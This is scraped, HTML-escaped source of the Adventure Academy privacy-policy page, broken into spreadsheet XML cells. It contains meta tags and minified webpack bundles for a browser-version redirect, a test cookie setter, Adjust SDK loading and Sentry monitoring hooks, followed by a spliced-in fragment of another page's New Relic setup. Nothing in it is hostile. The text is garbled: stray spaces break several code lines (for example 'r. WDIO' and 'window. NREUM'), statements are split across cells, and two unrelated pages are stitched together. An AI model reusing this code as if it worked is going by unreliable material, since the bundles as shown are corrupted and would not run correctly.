content="vhmyhr2xhBts6VfxiOGfYHNixFmrBmoT3pABMgXKSx8"&gt;&lt;meta name="thumbnail" content="/assets/templates/thumbnail/aa-thumbnail-150px-v1.png"&gt;&lt;meta property="og:title" content="Privacy Policy - Adventure Academy"&gt;
&lt;meta name="description" content="Your privacy is important to us. This privacy statement explains the personal data Age of Learning processes, how we processes it, and for what purposes.</t>
  </si>
  <si>
    <t>"&gt;
&lt;meta name="keywords" content="Learn, learning, reading, math, early learning, early childhood education, online books, teacher, digital learning, online learning, online games, Coolmath4kids, Makemegenius, Funbrain, adaptedmind, Lego, Minecraft, Roblox, Mario Party, Pokemon, privacy policy"&gt;
&lt;meta property="og:description" content="Your privacy is important to us. This privacy statement explains the personal data Age of Learning processes, how we processes it, and for what purposes. "&gt;
&lt;meta property="og:url" href="https://www.adventureacademy.com/privacy-policy"&gt;
&lt;script src="/assets/artifacts/rotation_config.js"&gt;&lt;/script&gt;&lt;script&gt;(window.webpackJsonp=window.webpackJsonp||[]).push([[8],{1:function(r,n,t){t("j36g"),r.exports=t("InbS")},InbS:function(r,n,t){var e=t("tpcZ"),i=[function(){var r=navigator.userAgent.match(/Android\s([0-9\.]*)/);if("string"!=typeof(r=r?r[1].replace("Android","").trim():null))return!1;if("4.4.4"===r)return!1;for(var n=/(\D)/g,t=r.split(n),e="4.4.4".split(n),i=Math.max(t.length,e.length),o=0;o&lt;i;o++){if(void</t>
  </si>
  <si>
    <t>0===t[o]&amp;&amp;(t[o]="0"),void 0===e[o]&amp;&amp;(e[o]="0"),parseInt(t[o],10)&gt;e[o])return!1;if(parseInt(t[o],10)&lt;e[o])return!0}},function(){var r=window.navigator.userAgent,n=r.indexOf("MSIE "),t=r.indexOf("Trident/");return 0&lt;n||0&lt;t},function(){return void 0===window.MutationObserver}],o=[function(){var r=window.navigator.userAgent;if(0&lt;r.indexOf("iPad")){var n=/\b[0-9]+_[0-9]+(?:_[0-9]+)?\b/.exec(r)[0].replace(/_/g,".</t>
  </si>
  <si>
    <t>");return e.compare(n,"9.3.5","&lt;=")}}];if(!/bot|googlebot|crawler|spider|robot|crawling/i.test(navigator.userAgent)){for(var a=0;a&lt;i.length;a++)i[a]()&amp;&amp;(window.location="/s/update-browser");for(a=0;a&lt;o.length;a++)o[a]()&amp;&amp;(window.location="/s/unsupported-device")}},tpcZ:function(r,n,t){var e,i;void 0===(i="function"==typeof(e=function(){var n=/^v?(?:\d+)(\.(?:[x*]|\d+)(\.(?:[x*]|\d+)(\.(?:[x*]|\d+))?(?:-[\da-z\-]+(?:\.[\da-z\-]+)*)?(?:\+[\da-z\-]+(?:\.[\da-z\-]+)*)?)?)?$/i;function s(r){var n,t=r.replace(/^v/,"").replace(/\+.*$/,""),e=("-",-1===(n=t).indexOf("-")?n.length:n.indexOf("-")),i=t.substring(0,e).split(". ");return i.push(t.substring(e+1)),i}function c(r){return isNaN(Number(r))?r:Number(r)}function g(r){if("string"!=typeof r)throw new TypeError("Invalid argument expected string");if(!n.test(r))throw new Error("Invalid argument not valid semver ('"+r+"' received)")}function i(r,n){[r,n].forEach(g);for(var t=s(r),e=s(n),i=0;i&lt;Math.max(t.length-1,e.length-1);i++){var o=parseInt(t[i]||0,10),a=parseInt(e[i]||0,10);if(a&lt;o)return 1;if(o&lt;a)return-1}var f=t[t.length-1],u=e[e.length-1];if(f&amp;&amp;u){var p=f.split(". ").map(c),d=u.split(".").map(c);for(i=0;i&lt;Math.max(p.length,d.length);i++){if(void 0===p[i]||"string"==typeof d[i]&amp;&amp;"number"==typeof p[i])return-1;if(void 0===d[i]||"string"==typeof p[i]&amp;&amp;"number"==typeof d[i])return 1;if(p[i]&gt;d[i])return 1;if(d[i]&gt;p[i])return-1}}else if(f||u)return f?-1:1;return 0}var o=["&gt;","&gt;=","=","&lt;","&lt;="],a={"&gt;":[1],"&gt;=":[0,1],"=":[0],"&lt;=":[-1,0],"&lt;":[-1]};return i.validate=function(r){return"string"==typeof r&amp;&amp;n.test(r)},i.compare=function(r,n,t){!function(r){if("string"!=typeof r)throw new TypeError("Invalid operator type, expected string but got "+typeof r);if(-1===o.indexOf(r))throw new TypeError("Invalid operator, expected one of "+o.join("|"))}(t);var e=i(r,n);return-1&lt;a[t].indexOf(e)},i})?e.apply(n,[]):e)||(r.exports=i)}},[[1,1,0]]])&lt;/script&gt;&lt;script&gt;(window.webpackJsonp=window.webpackJsonp||[]).push([[10],{4:function(e,a,n){n("j36g"),e.exports=n("uYPR")},uYPR:function(e,a,n){"use strict";n.r(a);var o=n("p46w"),s=n.n(o),t=n("Fp6a"),r=t.cookies,w=t.queryParamKeys,P=new URLSearchParams(window.location.search),c=P.get(w.</t>
  </si>
  <si>
    <t>WDIO),u=P.get(w. WDIO_SUPPRESS_PIXELS);c&amp;&amp;s.a.set(r. WDIO,c,r.CONFIG),"true"===u&amp;&amp;s.a.set(r.WDIO_SUPPRESS_PIXELS,"true",r.</t>
  </si>
  <si>
    <t>CONFIG)}},[[4,1,0]]])&lt;/script&gt;&lt;script&gt;/*! For license information please see adjust-web-sdk-7e7e4b88e7bf05b25951.js.LICENSE.txt */
(window.webpackJsonp=window.webpackJsonp||[]).push([[4],{"+924":function(t,e,n){"use strict";n.d(e,"d",(function(){return i})),n.d(e,"c",(function(){return o})),n.d(e,"b",(function(){return a})),n.d(e,"a",(function(){return s}));var r=n("9AQC");function i(t,e){return void 0===e&amp;&amp;(e=0),"string"!=typeof t||0===e||t.length&lt;=e?t: t.substr(0,e)+"..."}function o(t,e){var n=t,r=n.length;if(r&lt;=150)return n;e&gt;r&amp;&amp;(e=r);var i=Math.max(e-60,0);i&lt;5&amp;&amp;(i=0);var o=Math.min(i+140,r);return o&gt;r-5&amp;&amp;(o=r),o===r&amp;&amp;(i=Math.max(o-140,0)),n=n.slice(i,o),i&gt;0&amp;&amp;(n="'{snip} "+n),o&lt;r&amp;&amp;(n+=" {snip}"),n}function a(t,e){if(!Array.isArray(t))return"";for(var n=[],r=0;r&lt;t.length;r++){var i=t[r];try{n.push(String(i))}catch(t){n.push("[value cannot be serialized]")}}return n.join(e)}function s(t,e){return!!Object(r.l)(t)&amp;&amp;(Object(r.k)(e)?e.test(t):"string"==typeof e&amp;&amp;-1!==t.indexOf(e))}},"+A1k":function(t,e,n){"use strict";(function(t,r){n.d(e,"b",(function(){return o})),n.d(e,"a",(function(){return a})),n.d(e,"c",(function(){return s}));var</t>
  </si>
  <si>
    <t>i=n("RQwI");function o(){return!Object(i.a)()&amp;&amp;"[object process]"===Object.prototype.toString.call(void 0!==t?t:0)}function a(t,e){return t.require(e)}function s(t){var e;try{e=a(r,t)}catch(t){}try{var n=a(r,"process").cwd;e=a(r,n()+"/node_modules/"+t)}catch(t){}return e}}).call(this,n("8oxB"),n("3UD+")(t))},2:function(t,e,n){n("j36g"),t.exports=n("2FaR")},"2FaR":function(t,e,n){var r=n("flXI").AdjustService;!function(){try{r.getScript()}catch(t){return}}()},"2bdC":function(t,e,n){"use strict";n.d(e,"a",(function(){return s}));var r=n("6hSO"),i=n("8LbN"),o=n("i6wd"),a=n("FGHR");function s(){Object(r.a)("error",c),Object(r.a)("unhandledrejection",c)}function c(){var t=Object(a.a)();if(t){o.a&amp;&amp;i.c.log("[Tracing] Transaction: internal_error -&gt; Global error occured"),t.setStatus("internal_error")}}},"2mBW":function(t,e){t.exports=function(t){throw new TypeError('"'+t+'" is read-only')},t.exports.__esModule=!0,t.exports.default=t.exports},"3UD+":function(t,e){t.exports=function(t){if(!t.webpackPolyfill){var e=Object.create(t);e.children||(e.children=[]),Object.defineProperty(e,"loaded",{enumerable:!0,get:function(){return e.l}}),Object.defineProperty(e,"id",{enumerable:!0,get:function(){return e.i}}),Object.defineProperty(e,"exports",{enumerable:!0}),e.webpackPolyfill=1}return e}},"4Ssk":function(t,e,n){"use strict";n.d(e,"b",(function(){return a})),n.d(e,"a",(function(){return s})),n.d(e,"d",(function(){return c})),n.d(e,"e",(function(){return u})),n.d(e,"c",(function(){return p}));var r=n("NDfa"),i=n("z+RT"),o=n("8LbN");function a(){if(!("fetch"in Object(i.a)()))return!1;try{return new Headers,new Request(""),new Response,!0}catch(t){return!1}}function s(t){return t&amp;&amp;/^function fetch\(\)\s+\{\s+\[native code\]\s+\}$/.test(t.toString())}function c(){if(!a())return!1;var t=Object(i.a)();if(s(t.fetch))return!0;var e=!1,n=t.document;if(n&amp;&amp;"function"==typeof n.createElement)try{var c=n.createElement("iframe");c.hidden=!0,n.head.appendChild(c),c.contentWindow&amp;&amp;c.contentWindow.fetch&amp;&amp;(e=s(c.contentWindow.fetch)),n.head.removeChild(c)}catch(t){r.a&amp;&amp;o.c.warn("Could not create sandbox iframe for pure fetch check, bailing to window.fetch: ",t)}return e}function u(){if(!a())return!1;try{return new Request("_",{referrerPolicy:"origin"}),!0}catch(t){return!1}}function p(){var t=Object(i.a)(),e=t.chrome,n=e&amp;&amp;e.app&amp;&amp;e.app.runtime,r="history"in t&amp;&amp;!!t.history.pushState&amp;&amp;!!t.history.replaceState;return!n&amp;&amp;r}},"6PXS":function(t,e,n){"use strict";n.d(e,"e",(function(){return s})),n.d(e,"a",(function(){return c})),n.d(e,"g",(function(){return u})),n.d(e,"f",(function(){return p})),n.d(e,"h",(function(){return d})),n.d(e,"b",(function(){return f})),n.d(e,"d",(function(){return v})),n.d(e,"c",(function(){return m}));var</t>
  </si>
  <si>
    <t>r=n("mrSG"),i=n("vFt6"),o=n("9AQC"),a=n("+924");function s(t,e,n){if(e in t){var r=t[e],i=n(r);if("function"==typeof i)try{u(i,r)}catch(t){}t[e]=i}}function c(t,e,n){Object.defineProperty(t,e,{value:n,writable:!0,configurable:!0})}function u(t,e){var n=e.prototype||{};t.prototype=e.prototype=n,c(t,"__sentry_original__",e)}function p(t){return t.__sentry_original__}function d(t){return Object.keys(t).map((function(e){return encodeURIComponent(e)+"="+encodeURIComponent(t[e])})).join("&amp;")}function f(t){var e=t;if(Object(o.d)(t))e=Object(r.a)({message:t.message,name:t.name,stack:t.stack},h(t));else if(Object(o.f)(t)){var n=t;e=Object(r.a)({type:n.type,target:l(n.target),currentTarget:l(n.currentTarget)},h(n)),"undefined"!=typeof CustomEvent&amp;&amp;Object(o.g)(t,CustomEvent)&amp;&amp;(e.detail=n.detail)}return e}function l(t){try{return Object(o.c)(t)?Object(i.b)(t):Object.prototype.toString.call(t)}catch(t){return"&lt;unknown&gt;"}}function h(t){var e={};for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&amp;&amp;(e[n]=t[n]);return e}function v(t,e){void 0===e&amp;&amp;(e=40);var n=Object.keys(f(t));if(n.sort(),!n.length)return"[object has no keys]";if(n[0].length&gt;=e)return Object(a.d)(n[0],e);for(var r=n.length;r&gt;0;r--){var i=n.slice(0,r).join(", ");if(!(i.length&gt;e))return r===n.length?i:Object(a.d)(i,e)}return""}function m(t){var e,n;if(Object(o.i)(t)){var i={};try{for(var a=Object(r.f)(Object.keys(t)),s=a.next();!s.done;s=a.next()){var c=s.value;void 0!==t[c]&amp;&amp;(i[c]=m(t[c]))}}catch(t){e={error:t}}finally{try{s&amp;&amp;!s.done&amp;&amp;(n=a.return)&amp;&amp;n.call(a)}finally{if(e)throw e.error}}return i}return Array.isArray(t)?t.map(m):t}},"6hSO":function(t,e,n){"use strict";n.d(e,"a",(function(){return m}));var r,i=n("mrSG"),o=n("NDfa"),a=n("z+RT"),s=n("9AQC"),c=n("8LbN"),u=n("6PXS"),p=n("pRiV"),d=n("4Ssk"),f=Object(a.a)(),l={},h={};function v(t){if(!h[t])switch(h[t]=!0,t){case"console":!function(){if(!("console"in f))return;c.a.forEach((function(t){t in f.console&amp;&amp;Object(u.e)(f.console,t,(function(e){return function(){for(var n=[],r=0;r&lt;arguments.length;r++)n[r]=arguments[r];y("console",{args:n,level:t}),e&amp;&amp;e.apply(f.console,n)}}))}))}();break;case"dom":!function(){if(!("document"in f))return;var t=y.bind(null,"dom"),e=j(t,!0);f.document.addEventListener("click",e,!1),f.document.addEventListener("keypress",e,!1),["EventTarget","Node"].forEach((function(e){var n=f[e]&amp;&amp;f[e].prototype;n&amp;&amp;n.hasOwnProperty&amp;&amp;n.hasOwnProperty("addEventListener")&amp;&amp;(Object(u.e)(n,"addEventListener",(function(e){return function(n,r,i){if("click"===n||"keypress"==n)try{var o=this.__sentry_instrumentation_handlers__=this.__sentry_instrumentation_handlers__||{},a=o[n]=o[n]||{refCount:0};if(!a.handler){var s=j(t);a.handler=s,e.call(this,n,s,i)}a.refCount+=1}catch(t){}return e.call(this,n,r,i)}})),Object(u.e)(n,"removeEventListener",(function(t){return function(e,n,r){if("click"===e||"keypress"==e)try{var i=this.__sentry_instrumentation_handlers__||{},o=i[e];o&amp;&amp;(o.refCount-=1,o.refCount&lt;=0&amp;&amp;(t.call(this,e,o.handler,r),o.handler=void 0,delete i[e]),0===Object.keys(i).length&amp;&amp;delete this.__sentry_instrumentation_handlers__)}catch(t){}return t.call(this,e,n,r)}})))}))}();break;case"xhr":!function(){if(!("XMLHttpRequest"in f))return;var t=XMLHttpRequest.prototype;Object(u.e)(t,"open",(function(t){return function(){for(var e=[],n=0;n&lt;arguments.length;n++)e[n]=arguments[n];var r=this,i=e[1],o=r.__sentry_xhr__={method:Object(s.l)(e[0])?e[0].toUpperCase():e[0],url:e[1]};Object(s.l)(i)&amp;&amp;"POST"===o.method&amp;&amp;i.match(/sentry_key/)&amp;&amp;(r.__sentry_own_request__=!0);var a=function(){if(4===r.readyState){try{o.status_code=r.status}catch(t){}y("xhr",{args:e,endTimestamp:Date.now(),startTimestamp:Date.now(),xhr:r})}};return"onreadystatechange"in r&amp;&amp;"function"==typeof r.onreadystatechange?Object(u.e)(r,"onreadystatechange",(function(t){return function(){for(var e=[],n=0;n&lt;arguments.length;n++)e[n]=arguments[n];return a(),t.apply(r,e)}})):r.addEventListener("readystatechange",a),t.apply(r,e)}})),Object(u.e)(t,"send",(function(t){return function(){for(var e=[],n=0;n&lt;arguments.length;n++)e[n]=arguments[n];return this.__sentry_xhr__&amp;&amp;void 0!==e[0]&amp;&amp;(this.__sentry_xhr__.body=e[0]),y("xhr",{args:e,startTimestamp:Date.now(),xhr:this}),t.apply(this,e)}}))}();break;case"fetch":!function(){if(!Object(d.d)())return;Object(u.e)(f,"fetch",(function(t){return function(){for(var e=[],n=0;n&lt;arguments.length;n++)e[n]=arguments[n];var r={args:e,fetchData:{method:b(e),url:g(e)},startTimestamp:Date.now()};return y("fetch",Object(i.a)({},r)),t.apply(f,e).then((function(t){return y("fetch",Object(i.a)(Object(i.a)({},r),{endTimestamp:Date.now(),response:t})),t}),(function(t){throw y("fetch",Object(i.a)(Object(i.a)({},r),{endTimestamp:Date.now(),error:t})),t}))}}))}();break;case"history":!function(){if(!Object(d.c)())return;var t=f.onpopstate;function e(t){return function(){for(var e=[],n=0;n&lt;arguments.length;n++)e[n]=arguments[n];var i=e.length&gt;2?e[2]:void 0;if(i){var o=r,a=String(i);r=a,y("history",{from:o,to:a})}return t.apply(this,e)}}f.onpopstate=function(){for(var e=[],n=0;n&lt;arguments.length;n++)e[n]=arguments[n];var i=f.location.href,o=r;if(r=i,y("history",{from:o,to:i}),t)try{return t.apply(this,e)}catch(t){}},Object(u.e)(f.history,"pushState",e),Object(u.e)(f.history,"replaceState",e)}();break;case"error":S=f.onerror,f.onerror=function(t,e,n,r,i){return y("error",{column:r,error:i,line:n,msg:t,url:e}),!!S&amp;&amp;S.apply(this,arguments)};break;case"unhandledrejection":x=f.onunhandledrejection,f.onunhandledrejection=function(t){return y("unhandledrejection",t),!x||x.apply(this,arguments)};break;default:return void(o.a&amp;&amp;c.c.warn("unknown instrumentation type:",t))}}function m(t,e){l[t]=l[t]||[],l[t].push(e),v(t)}function y(t,e){var n,r;if(t&amp;&amp;l[t])try{for(var a=Object(i.f)(l[t]||[]),s=a.next();!s.done;s=a.next()){var u=s.value;try{u(e)}catch(e){o.a&amp;&amp;c.c.error("Error while triggering instrumentation handler.\nType: "+t+"\nName: "+Object(p.b)(u)+"\nError:",e)}}}catch(t){n={error:t}}finally{try{s&amp;&amp;!s.done&amp;&amp;(r=a.return)&amp;&amp;r.call(a)}finally{if(n)throw n.error}}}function b(t){return void 0===t&amp;&amp;(t=[]),"Request"in f&amp;&amp;Object(s.g)(t[0],Request)&amp;&amp;t[0].method?String(t[0].method).toUpperCase():t[1]&amp;&amp;t[1].method?String(t[1].method).toUpperCase():"GET"}function g(t){return void 0===t&amp;&amp;(t=[]),"string"==typeof t[0]?t[0]:"Request"in f&amp;&amp;Object(s.g)(t[0],Request)?t[0].url:String(t[0])}var _,O;function j(t,e){return void 0===e&amp;&amp;(e=!1),function(n){if(n&amp;&amp;O!==n&amp;&amp;!function(t){if("keypress"!==t.type)return!1;try{var e=t.target;if(!e||!e.tagName)return!0;if("INPUT"===e.tagName||"TEXTAREA"===e.tagName||e.isContentEditable)return!1}catch(t){}return!0}(n)){var r="keypress"===n.type?"input":n.type;(void 0===_||function(t,e){if(!t)return!0;if(t.type!==e.type)return!0;try{if(t.target!==e.target)return!0}catch(t){}return!1}(O,n))&amp;&amp;(t({event:n,name:r,global:e}),O=n),clearTimeout(_),_=f.setTimeout((function(){_=void 0}),1e3)}}}var S=null;var x=null},"7W2i":function(t,e,n){var r=n("SksO");t.exports=function(t,e){if("function"!=typeof e&amp;&amp;null!==e)throw new TypeError("Super expression must either be null or a function");t.prototype=Object.create(e&amp;&amp;e.prototype,{constructor:{value:t,writable:!0,configurable:!0}}),Object.defineProperty(t,"prototype",{writable:!1}),e&amp;&amp;r(t,e)},t.exports.__esModule=!0,t.exports.default=t.exports},"8LbN":function(t,e,n){"use strict";n.d(e,"a",(function(){return c})),n.d(e,"b",(function(){return u})),n.d(e,"c",(function(){return r}));var r,i=n("mrSG"),o=n("NDfa"),a=n("z+RT"),s=Object(a.a)(),c=["debug","info","warn","error","log","assert"];function u(t){var e=Object(a.a)();if(!("console"in e))return t();var n=e.console,r={};c.forEach((function(t){var i=n[t]&amp;&amp;n[t].__sentry_original__;t in e.console&amp;&amp;i&amp;&amp;(r[t]=n[t],n[t]=i)}));try{return t()}finally{Object.keys(r).forEach((function(t){n[t]=r[t]}))}}function p(){var t=!1,e={enable:function(){t=!0},disable: function(){t=!1}};return o.a?c.forEach((function(n){e[n]=function(){for(var e=[],r=0;r&lt;arguments.length;r++)e[r]=arguments[r];t&amp;&amp;u((function(){var t;(t=s.console)[n].apply(t,Object(i.e)(["Sentry Logger</t>
  </si>
  <si>
    <t>["+n+"]:"],e))}))}})):c.forEach((function(t){e[t]=function(){}})),e}r=o.a?Object(a.b)("logger",p):p()},"8oxB":function(t,e){var n,r,i=t.exports={};function o(){throw new Error("setTimeout has not been defined")}function a(){throw new Error("clearTimeout has not been defined")}function s(t){if(n===setTimeout)return setTimeout(t,0);if((n===o||!n)&amp;&amp;setTimeout)return n=setTimeout,setTimeout(t,0);try{return n(t,0)}catch(e){try{return n.call(null,t,0)}catch(e){return n.call(this,t,0)}}}!function(){try{n="function"==typeof setTimeout?setTimeout:o}catch(t){n=o}try{r="function"==typeof clearTimeout?clearTimeout:a}catch(t){r=a}}();var c,u=[],p=!1,d=-1;function f(){p&amp;&amp;c&amp;&amp;(p=!1,c.length?u=c.concat(u):d=-1,u.length&amp;&amp;l())}function l(){if(!p){var t=s(f);p=!0;for(var e=u.length;e;){for(c=u,u=[];++d&lt;e;)c&amp;&amp;c[d].run();d=-1,e=u.length}c=null,p=!1,function(t){if(r===clearTimeout)return clearTimeout(t);if((r===a||!r)&amp;&amp;clearTimeout)return r=clearTimeout,clearTimeout(t);try{r(t)}catch(e){try{return r.call(null,t)}catch(e){return r.call(this,t)}}}(t)}}function h(t,e){this.fun=t,this.array=e}function v(){}i.nextTick=function(t){var e=new Array(arguments.length-1);if(arguments.length&gt;1)for(var n=1;n&lt;arguments.length;n++)e[n-1]=arguments[n];u.push(new h(t,e)),1!==u.length||p||s(l)},h.prototype.run=function(){this.fun.apply(null,this.array)},i.title="browser",i.browser=!0,i.env={},i.argv=[],i.version="",i.versions={},i.on=v,i.addListener=v,i.once=v,i.off=v,i.removeListener=v,i.removeAllListeners=v,i.emit=v,i.prependListener=v,i.prependOnceListener=v,i.listeners=function(t){return[]},i.binding=function(t){throw new Error("process.binding is not supported")},i.cwd=function(){return"/"},i.chdir=function(t){throw new Error("process.chdir is not supported")},i.umask =function(){return 0}},"8yT3":function(t,e,n){"use strict";n.d(e,"a",(function(){return i}));var r=new RegExp("^[ \\t]*([0-9a-f]{32})?-?([0-9a-f]{16})?-?([01])? [ \\t]*$");function i(t){var e=t.match(r);if(e){var n=void 0;return"1"===e[3]?n=!0:"0"===e[3]&amp;&amp;(n=!1),{traceId:e[1],parentSampled:n,parentSpanId:e[2]}}}},"9/Zf":function(t,e,n){"use strict";n.d(e,"f",(function(){return a})),n.d(e,"e",(function(){return s})),n.d(e,"d",(function(){return u})),n.d(e,"b",(function(){return</t>
  </si>
  <si>
    <t>p})),n.d(e,"a",(function(){return d})),n.d(e,"c",(function(){return f}));var</t>
  </si>
  <si>
    <t>r=n("mrSG"),i=n("z+RT"),o=n("6PXS");n("+924");function a(){var t=Object(i.a)(),e=t.crypto||t.msCrypto;if(void 0!==e&amp;&amp;e.getRandomValues){var n=new Uint16Array(8);e.getRandomValues(n),n[3]=4095&amp;n[3]|16384,n[4]=16383&amp;n[4]|32768;var r=function(t){for(var e=t.toString(16);e.length&lt;4;)e="0"+e;return e};return r(n[0])+r(n[1])+r(n[2])+r(n[3])+r(n[4])+r(n[5])+r(n[6])+r(n[7])}return"xxxxxxxxxxxx4xxxyxxxxxxxxxxxxxxx".replace(/[xy]/g,(function(t){var e=16*Math.random()|0;return("x"===t?e:3&amp;e|8).toString(16)}))}function s(t){if(!t)return{};var e=t.match(/^(([^:/?#]+):)?(\/\/([^/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?$/);if(!e)return{};var n=e[6]||"",r=e[8]||"";return{host:e[4],path:e[5],protocol:e[2],relative: e[5]+n+r}}function c(t){return t.exception&amp;&amp;t.exception.values?t.exception.values[0]:void 0}function u(t){var e=t.message,n=t.event_id;if(e)return e;var r=c(t);return r?r.type&amp;&amp;r.value?r.type+": "+r.value:r.type||r.value||n||"&lt;unknown&gt;":n||"&lt;unknown&gt;"}function p(t,e,n){var r=t.exception=t.exception||{},i=r.values=r.values||[],o=i[0]=i[0]||{};o.value||(o.value=e||""),o.type||(o.type=n||"Error")}function d(t,e){var n=c(t);if(n){var i=n.mechanism;if(n.mechanism=Object(r.a)(Object(r.a)(Object(r.a)({},{type:"generic",handled:!0}),i),e),e&amp;&amp;"data"in e){var o=Object(r.a)(Object(r.a)({},i&amp;&amp;i.data),e.data);n.mechanism.data=o}}}function f(t){if(t&amp;&amp;t.__sentry_captured__)return!0;try{Object(o.a)(t,"__sentry_captured__",!0)}catch(t){}return!1}},"9AQC":function(t,e,n){"use strict";n.d(e,"d",(function(){return i})),n.d(e,"e",(function(){return a})),n.d(e,"a",(function(){return s})),n.d(e,"b",(function(){return c})),n.d(e,"l",(function(){return u})),n.d(e,"j",(function(){return p})),n.d(e,"i",(function(){return d})),n.d(e,"f",(function(){return f})),n.d(e,"c",(function(){return l})),n.d(e,"k",(function(){return h})),n.d(e,"n",(function(){return v})),n.d(e,"m",(function(){return m})),n.d(e,"h",(function(){return y})),n.d(e,"g",(function(){return b}));var r=Object.prototype.toString;function i(t){switch(r.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":return!0;default:return b(t,Error)}}function o(t,e){return r.call(t)==="[object "+e+"]"}function a(t){return o(t,"ErrorEvent")}function s(t){return o(t,"DOMError")}function c(t){return o(t,"DOMException")}function u(t){return o(t,"String")}function p(t){return null===t||"object"!=typeof t&amp;&amp;"function"!=typeof t}function d(t){return o(t,"Object")}function f(t){return"undefined"!=typeof Event&amp;&amp;b(t,Event)}function l(t){return"undefined"!=typeof Element&amp;&amp;b(t,Element)}function h(t){return o(t,"RegExp")}function v(t){return Boolean(t&amp;&amp;t.then&amp;&amp;"function"==typeof t.then)}function m(t){return</t>
  </si>
  <si>
    <t>d(t)&amp;&amp;"nativeEvent"in t&amp;&amp;"preventDefault"in t&amp;&amp;"stopPropagation"in t}function y(t){return"number"==typeof t&amp;&amp;t!=t}function b(t,e){try{return t instanceof e}catch(t){return!1}}},Cpvd:function(t,e,n){"use strict";(function(t){n.d(e,"b",(function(){return m})),n.d(e,"a",(function(){return y}));var r=n("mrSG"),i=n("lW6c"),o=n("8LbN"),a=n("9AQC"),s=n("+A1k"),c=n("2bdC"),u=n("i6wd"),p=n("MBYv"),d=n("EldZ"),f=n("FGHR");function l(){var t=this.getScope();if(t){var e=t.getSpan();if(e)return{"sentry-trace":e.toTraceparent()}}return{}}function h(t,e,n){return Object(f.b)(e)?void 0!==t.sampled?(t.setMetadata({transactionSampling:{method:"explicitly_set"}}),t):("function"==typeof e.tracesSampler?(r=e.tracesSampler(n),t.setMetadata({transactionSampling:{method:"client_sampler",rate:Number(r)}})):void 0!==n.parentSampled?(r=n.parentSampled,t.setMetadata({transactionSampling:{method:"inheritance"}})):(r=e.tracesSampleRate,t.setMetadata({transactionSampling:{method:"client_rate",rate:Number(r)}})),function(t){if(Object(a.h)(t)||"number"!=typeof t&amp;&amp;"boolean"!=typeof t)return u.a&amp;&amp;o.c.warn("[Tracing]</t>
  </si>
  <si>
    <t>Given sample rate is invalid. Sample rate must be a boolean or a number between 0 and 1. Got "+JSON.stringify(t)+" of type "+JSON.stringify(typeof t)+".</t>
  </si>
  <si>
    <t>"),!1;if(t&lt;0||t&gt;1)return u.a&amp;&amp;o.c.warn("[Tracing] Given sample rate is invalid. Sample rate must be between 0 and 1.</t>
  </si>
  <si>
    <t>Got "+t+". "),!1;return!0}(r)?r?(t.sampled=Math.random()&lt;r,t.sampled?(u.a&amp;&amp;o.c.log("[Tracing] starting "+t.op+" transaction - "+t.name),t):(u.a&amp;&amp;o.c.log("[Tracing] Discarding transaction because it's not included in the random sample (sampling rate = "+Number(r)+")"),t)):(u.a&amp;&amp;o.c.log("[Tracing] Discarding transaction because "+("function"==typeof e.tracesSampler?"tracesSampler returned 0 or false":"a negative sampling decision was inherited or tracesSampleRate is set to 0")),t.sampled=!1,t):(u.a&amp;&amp;o.c.warn("[Tracing] Discarding transaction because of invalid sample rate.</t>
  </si>
  <si>
    <t>"),t.sampled=!1,t)):(t.sampled=!1,t);var r}function v(t,e){var n=this.getClient(),i=n&amp;&amp;n.getOptions()||{},o=new d.a(t,this);return(o=h(o,i,Object(r.a)({parentSampled:t.parentSampled,transactionContext:t},e))).sampled&amp;&amp;o.initSpanRecorder(i._experiments&amp;&amp;i._experiments.maxSpans),o}function m(t,e,n,i,o){var a=t.getClient(),s=a&amp;&amp;a.getOptions()||{},c=new p.b(e,t,n,i);return(c=h(c,s,Object(r.a)({parentSampled:e.parentSampled,transactionContext:e},o))).sampled&amp;&amp;c.initSpanRecorder(s._experiments&amp;&amp;s._experiments.maxSpans),c}function y(){var e;(e=Object(i.c)()).__SENTRY__&amp;&amp;(e.__SENTRY__.extensions=e.__SENTRY__.extensions||{},e.__SENTRY__.extensions.startTransaction||(e.__SENTRY__.extensions.startTransaction=v),e.__SENTRY__.extensions.traceHeaders||(e.__SENTRY__.extensions.traceHeaders=l)),Object(s.b)()&amp;&amp;function(){var e=Object(i.c)();if(e.__SENTRY__){var n={mongodb:function(){return new(Object(s.a)(t,"./integrations/node/mongo").Mongo)},mongoose:function(){return new(Object(s.a)(t,"./integrations/node/mongo").Mongo)({mongoose:!0})},mysql:function(){return new(Object(s.a)(t,"./integrations/node/mysql").Mysql)},pg:function(){return new(Object(s.a)(t,"./integrations/node/postgres").Postgres)}},o=Object.keys(n).filter((function(t){return!!Object(s.c)(t)})).map((function(t){try{return n[t]()}catch(t){return}})).filter((function(t){return t}));o.length&gt;0&amp;&amp;(e.__SENTRY__.integrations=Object(r.e)(e.__SENTRY__.integrations||[],o))}}(),Object(c.a)()}}).call(this,n("3UD+")(t))},DOAG:function(t,e,n){"use strict";n.d(e,"a",(function(){return b}));var r=n("lSNA"),i=n.n(r),o=n("lwsE")</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta charset="utf-8" /&gt;
&lt;script&gt;window. NREUM||(NREUM={});NREUM.info={"beacon":"bam.eu01.nr-data.net","errorBeacon":"bam.eu01.nr-data.net","licenseKey":"NRJS-b16ef269fd11602a41e","applicationID":"221357536","transactionName":"JhpeRQoXX1kDF0sCVgsBVV8MV0BdCRI=","queueTime":0,"applicationTime":176,"agent":""}&lt;/script&gt;
&lt;script&gt;(window. NREUM||(NREUM={})).init={privacy:{cookies_enabled:true},ajax:{deny_list:["bam.eu01.nr-data.net"]},distributed_tracing:{enabled:true}};(window.</t>
  </si>
  <si>
